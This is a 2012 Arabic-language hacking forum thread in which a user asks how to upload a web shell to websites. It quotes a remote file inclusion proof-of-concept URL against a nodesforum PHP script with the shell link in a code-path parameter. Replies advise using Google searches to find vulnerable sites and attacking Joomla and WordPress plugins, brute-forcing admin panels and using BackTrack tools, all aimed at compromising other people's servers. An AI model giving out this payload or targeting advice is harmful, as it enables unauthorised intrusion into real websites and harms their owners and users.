:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   طلب طريقة لرفع شل (http://www.vbspiders.com/vb/t62543.html)

Sn4Ke'z 05-26-2012 08:57 PM

طلب طريقة لرفع شل
 
السلأم عليكم .. ممكن موقع ارفع عليه شل
مثل استغلال هذه الثغرة .. يعني لازمك تربط رابط الشل بالملف المصاب
PoC: http://[target_host]/nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode]

mido868 05-26-2012 09:59 PM

رد: طلب طريقة لرفع شل
 
اقتباس:

المشاركة الأصلية كتبت بواسطة Sn4Ke'z (المشاركة 437401)
السلأم عليكم .. ممكن موقع ارفع عليه شل
مثل استغلال هذه الثغرة .. يعني لازمك تربط رابط الشل بالملف المصاب
PoC: http://[target_host]/nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode]

رفع الشيل له عدة طرق وسأحاول ان أجعل الامور بسيطة لكى تتضح الفكرة
النوع الذى ذكرته وهو نوع من انواع الثغرات تسمى الفايل انكلود وهى عبارة عن مواقع بها أخطاء او ملفات مصابة بخطأ برمجى يمكنك من خلال هذا الخطأ رفع الشيل ولكى تقوم بها أولا عليك ان تقوم برفع الشيل الخاص بك برابط مباشر ثم وضعه بعد رابط الموقع المصاب

كل ماعليك ان تبحث بعمو جوجل عن مواقع مصابة بهذه الثغرة وسوف تتمكن من رفع الشيل

Sn4Ke'z 05-26-2012 10:26 PM

نعم أخي و هذا الذي أطلبه .. أطلب موقع يعطيني رابط مباشر للشل لكي استعمله في هذه الثغرات

أوكي ياغالي شكرا ع التوجيه الجيد ..
ممكن تنصحني بثغرة جيدة و منتشرة بكثرة غير الـ Sql

شكرا جزيلأ لك ع التوجيه
حاليا اعرف كيفية استغلال عدد قليل من الثغرات
و طبعا LFI و XSS لأ أفقه فيهم شي
لكن أحاول ان شاء الله

MaFia 05-26-2012 10:46 PM

وعليكم السلام ورحمة الله وبركاته

ثغرات الريموت الان غير موجوده

الا بنسبة 1%
الثغره تعمل على اصدارات البي اتش بي 4 واقل

تقدر ترفع الشل على مساحه مجانيه

يوجدا ثغرات
local file

نفس انتشار ثغرات sql
يوجد ثغرات اخرى
xss
وثغرات
xss html
وثغرات
PHP Code Injection
وثغرات
Remote Command Execution

وثغرات
upload

استهدف عن طريق اضافات جملا واضافات الورد بريس
والبروت فورس على اللوحات

خمن على قواعد السيرفر
استعمل ادوات الباك تراك

كله مفيد فى الاستهداف

vpn_31 05-27-2012 04:03 AM

رد: طلب طريقة لرفع شل
 
ياغالي هذه ألثفرة منقرضه لا وجود لها يعني أحتمال تجد موقع واحد من أصل مليونين موقع...
وحتى لا تشتغل على Php5 تم ترقيع سحب ملف من خارج سيرفر لداخل السيرفر
أنصحك بتعلم ثغراة Bypass Upload , Xss , Sql

amin24566 12-08-2014 03:50 PM

رد: طلب طريقة لرفع شل
 
thx


الساعة الآن 09:19 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0